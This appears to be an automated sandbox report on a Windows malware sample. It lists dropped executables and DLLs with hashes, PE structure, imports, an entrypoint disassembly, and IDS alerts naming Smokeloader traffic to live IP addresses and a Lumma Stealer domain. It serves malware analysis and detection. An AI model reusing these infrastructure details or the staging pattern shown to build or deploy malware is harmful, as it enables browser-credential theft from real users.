                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2046288
                                                            Entropy (8bit):6.787733948558952
                                                            Encrypted:false
                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):257872
                                                            Entropy (8bit):6.727482641240852
                                                            Encrypted:false
                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):80880
                                                            Entropy (8bit):6.920480786566406
                                                            Encrypted:false
                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2459136
                                                            Entropy (8bit):6.052474106868353
                                                            Encrypted:false
                                                            SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                            MD5:90E744829865D57082A7F452EDC90DE5
                                                            SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                            SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                            SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\5876.exe

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):325120
                                                            Entropy (8bit):7.384635086921583
                                                            Encrypted:false
                                                            SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                            MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                            SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                            SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                            SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[7..:Y.:Y.:Y.h..:Y.h...:Y.h..:Y.B..:Y.:X..:Y.1...:Y.h..:Y.1...:Y.Rich.:Y.........................PE..L......c.....................t.......=....... ....@.................................p..........................................d...................................H................................x..@............ ..d............................text...3........................... ..`.rdata...l... ...n..................@..@.data....F...........~..............@....rsrc................L..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\EE6.exe

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):1986560
                                                            Entropy (8bit):6.829344277409385
                                                            Encrypted:false
                                                            SSDEEP:49152:CdKfTn6vGJtTF+TxMoxc1TU+j+dAzGwlrh:CdKfTnltIuoITsdZ
                                                            MD5:2095273C7B526065D7094738AA070E1B
                                                            SHA1:6C5A76DD98D42BF2245A249DF4CE32B82AA7A9D3
                                                            SHA-256:F3982D6E94DF1A27ABA2B6D04EAAE994A3C806932D8ECB9AD29287AA499E8B28
                                                            SHA-512:1A56CA6F0C8B4FA5C55AE5048B42A74FE808FEEE102BD9CBC65184A70DAE81127196BA363A50907C11814C749533639A4ACE850910A9420A2F2EBC221B762E8A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................@...........M.......P....@..............................................@...............................!.......&......................t...................................................................................CODE....H>.......@.................. ..`DATA....D)...P...*...D..............@...BSS..................n...................idata...!......."...n..............@....tls.....................................rdata..............................@..P.reloc..t...........................@..P.rsrc....&.......&...*..............@..P.....................P..............@..P........................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\katDDA4.tmp

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\EE6.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):881664
                                                            Entropy (8bit):6.555251818096116
                                                            Encrypted:false
                                                            SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                            MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                            SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                            SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                            SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\etrtabd

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):247296
                                                            Entropy (8bit):5.745908027977852
                                                            Encrypted:false
                                                            SSDEEP:3072:YfyeMIAMR7SdybsfrNzUUStydjJ5byzzgrLuj:Yf4MRmworZTStydja3+LM
                                                            MD5:C5261E67BD6D58771E27D7214E8F1C8F
                                                            SHA1:6FD857B3EBDB3888785D41F20277BC4E045BF704
                                                            SHA-256:09D1EBA82060A4FF75575B471D563A5E02485E0AAA3AFE743802A50D6E987410
                                                            SHA-512:CB14F7849F1552EF965C5EE0A2DCE2B860452A00C17EACB450A4C7CAD6EB991F6BAB2B3182352BEF134867D6E164769DF1A3B113A3A4BC3618C38B682CD5F83F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO...O..sO...O..sO...O..sO...O..sO.J.O..sO..rO..sO...O..sO...O..sO...O..sORich..sO........PE..L....,Rd....................."......*!............@.................................J].......................................<..(........i..............................................................................l............................text............................... ..`.rdata...t.......v..................@..@.data........P...0...,..............@....rsrc....i.......j...\..............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):5.745908027977852
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:xvJv1BpknZ.exe
                                                            File size:247'296 bytes
                                                            MD5:c5261e67bd6d58771e27d7214e8f1c8f
                                                            SHA1:6fd857b3ebdb3888785d41f20277bc4e045bf704
                                                            SHA256:09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
                                                            SHA512:cb14f7849f1552ef965c5ee0a2dce2b860452a00c17eacb450a4c7cad6eb991f6bab2b3182352bef134867d6e164769df1a3b113a3a4bc3618c38b682cd5f83f
                                                            SSDEEP:3072:YfyeMIAMR7SdybsfrNzUUStydjJ5byzzgrLuj:Yf4MRmworZTStydja3+LM
                                                            TLSH:5C346C0372E0BD51E966C6329EEEE2F87A1EF5508E59F36E22185A2F0471072C36F751
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO...O..sO...O..sO...O..sO...O..sO.J.O..sO..rO..sO...O..sO...O..sO...O..sORich..sO........PE..L....,Rd...........

                                                            File Icon

                                                            Icon Hash:1b2b252529170f17

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x40212a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x64522CE0 [Wed May 3 09:44:00 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:685f8d2b72817b55d930686b099b647b

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F2FD515F556h
                                                            jmp 00007F2FD515B59Dh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            mov ecx, dword ptr [esp+04h]
                                                            test ecx, 00000003h
                                                            je 00007F2FD515B746h
                                                            mov al, byte ptr [ecx]
                                                            add ecx, 01h
                                                            test al, al
                                                            je 00007F2FD515B770h
                                                            test ecx, 00000003h
                                                            jne 00007F2FD515B711h
                                                            add eax, 00000000h
                                                            lea esp, dword ptr [esp+00000000h]
                                                            lea esp, dword ptr [esp+00000000h]
                                                            mov eax, dword ptr [ecx]
                                                            mov edx, 7EFEFEFFh
                                                            add edx, eax
                                                            xor eax, FFFFFFFFh
                                                            xor eax, edx
                                                            add ecx, 04h
                                                            test eax, 81010100h
                                                            je 00007F2FD515B70Ah
                                                            mov eax, dword ptr [ecx-04h]
                                                            test al, al
                                                            je 00007F2FD515B754h
                                                            test ah, ah
                                                            je 00007F2FD515B746h
                                                            test eax, 00FF0000h
                                                            je 00007F2FD515B735h
                                                            test eax, FF000000h
                                                            je 00007F2FD515B724h
                                                            jmp 00007F2FD515B6EFh
                                                            lea eax, dword ptr [ecx-01h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            lea eax, dword ptr [ecx-02h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            lea eax, dword ptr [ecx-03h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            lea eax, dword ptr [ecx-04h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 20h
                                                            mov eax, dword ptr [ebp+08h]
                                                            push esi
                                                            push edi
                                                            push 00000008h
                                                            pop ecx
                                                            mov esi, 0040D230h
                                                            lea edi, dword ptr [ebp-20h]
                                                            rep movsd
                                                            mov dword ptr [ebp-08h], eax
                                                            mov eax, dword ptr [ebp+0Ch]
                                                            pop edi
                                                            mov dword ptr [ebp-04h], eax
                                                            pop esi
                                                            test eax, eax

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [C++] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x23c9c0x28.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b710000x169d0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0xd0000x16c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000xb1ad0xb20030d1dbbfc25912c04703cb05e6e51a5eFalse0.613939606741573data6.580117479602431IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0xd0000x174d40x17600428e17fcd8a02e1a310cdd97f7ec427bFalse0.6072025401069518data5.990184385845487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x250000x1b4bea80x30009008a17250967990915b873cda3f667eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x1b710000x169d00x16a00c45d1674ab923dfc86c77d975da15b74False0.3851864640883978data4.379549373991237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_CURSOR0x1b851800x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                            RT_CURSOR0x1b852c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                            RT_ICON0x1b718b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.3370075046904315
                                                            RT_ICON0x1b729700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3829957356076759
                                                            RT_ICON0x1b738180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.4851083032490975
                                                            RT_ICON0x1b740c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5345622119815668
                                                            RT_ICON0x1b747880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5751445086705202
                                                            RT_ICON0x1b74cf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4175311203319502
                                                            RT_ICON0x1b772980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.43105065666041276
                                                            RT_ICON0x1b783400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4819672131147541
                                                            RT_ICON0x1b78cc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.49113475177304966
                                                            RT_ICON0x1b791a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.35581023454157784
                                                            RT_ICON0x1b7a0500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.44314079422382674
                                                            RT_ICON0x1b7a8f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.45852534562211983
                                                            RT_ICON0x1b7afc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.4682080924855491
                                                            RT_ICON0x1b7b5280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.31182572614107884
                                                            RT_ICON0x1b7dad00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.3614754098360656
                                                            RT_ICON0x1b7e4580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.3874113475177305
                                                            RT_ICON0x1b7e9280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.37100213219616207
                                                            RT_ICON0x1b7f7d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.46525270758122744
                                                            RT_ICON0x1b800780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.47119815668202764
                                                            RT_ICON0x1b807400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5057803468208093
                                                            RT_ICON0x1b80ca80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.26524896265560166
                                                            RT_ICON0x1b832500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.2879924953095685
                                                            RT_ICON0x1b842f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.31721311475409836
                                                            RT_ICON0x1b84c800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3448581560283688
                                                            RT_DIALOG0x1b863700xacdata0.7151162790697675
                                                            RT_STRING0x1b864200xeadata0.5256410256410257
                                                            RT_STRING0x1b865100x4c2data0.4490968801313629
                                                            RT_STRING0x1b869d80x1a8data0.5023584905660378
                                                            RT_STRING0x1b86b800x162data0.5084745762711864
                                                            RT_STRING0x1b86ce80x69edata0.4279811097992916
                                                            RT_STRING0x1b873880x45cdata0.46236559139784944
                                                            RT_STRING0x1b877e80x1e4data0.48140495867768596
                                                            RT_ACCELERATOR0x1b851600x20data1.15625
                                                            RT_GROUP_CURSOR0x1b852b00x14data1.15
                                                            RT_GROUP_CURSOR0x1b861700x14data1.25
                                                            RT_GROUP_ICON0x1b791300x76dataTurkishTurkey0.6694915254237288
                                                            RT_GROUP_ICON0x1b7e8c00x68dataTurkishTurkey0.7019230769230769
                                                            RT_GROUP_ICON0x1b850e80x76dataTurkishTurkey0.6694915254237288
                                                            RT_GROUP_ICON0x1b729580x14dataTurkishTurkey1.1
                                                            RT_VERSION0x1b861880x1e4data0.5785123966942148

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllSetDefaultCommConfigA, SleepEx, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesA, GetConsoleAliasesLengthA, EnumTimeFormatsW, ActivateActCtx, ReadFileScatter, WriteConsoleOutputA, InitAtomTable, InterlockedPopEntrySList, SetConsoleMode, GetFileAttributesW, LocalReAlloc, FileTimeToSystemTime, GetModuleFileNameW, CompareStringW, RaiseException, InterlockedExchange, SetLastError, GetProcAddress, GetProcessHeaps, BuildCommDCBW, LoadLibraryA, UnhandledExceptionFilter, SetConsoleTitleW, DeleteCriticalSection, GetShortPathNameW, SetCalendarInfoA, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            TurkishTurkey

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            05/27/24-15:24:02.901341TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5307980192.168.2.8109.175.29.39
                                                            05/27/24-15:26:24.246699TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312680192.168.2.8190.147.128.172
                                                            05/27/24-15:27:00.582448TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5313280192.168.2.8190.147.128.172
                                                            05/27/24-15:25:27.096781TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5311680192.168.2.8109.175.29.39
                                                            05/27/24-15:23:38.823921TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5307080192.168.2.8109.175.29.39
                                                            05/27/24-15:23:31.525949TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971280192.168.2.8190.13.174.94
                                                            05/27/24-15:25:44.351947TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5311980192.168.2.8109.175.29.39
                                                            05/27/24-15:23:40.496460TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5307380192.168.2.8109.175.29.39
                                                            05/27/24-15:26:42.784525TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312980192.168.2.8190.147.128.172
                                                            05/27/24-15:24:08.932496TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5308480192.168.2.8109.175.29.39
                                                            05/27/24-15:23:30.215169TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971180192.168.2.8190.13.174.94
                                                            05/27/24-15:26:13.597836TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312480192.168.2.8190.147.128.172
                                                            05/27/24-15:25:56.339916TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312180192.168.2.8109.175.29.39
                                                            05/27/24-15:23:26.259477TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4970880192.168.2.8190.13.174.94
                                                            05/27/24-15:25:32.321607TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5311780192.168.2.8109.175.29.39
                                                            05/27/24-15:23:36.361209UDP2052787ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop)5139753192.168.2.81.1.1.1
                                                            05/27/24-15:23:37.979178TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5306980192.168.2.8109.175.29.39
                                                            05/27/24-15:26:32.065397TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312780192.168.2.8190.147.128.172
                                                            05/27/24-15:26:05.875359TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312380192.168.2.8109.175.29.39
                                                            05/27/24-15:25:49.165527TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)5312080192.168.2.8109.175.29.39
                                                            05/27/24-15:23:28.922755TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4971080192.168.2.8190.13.174.94
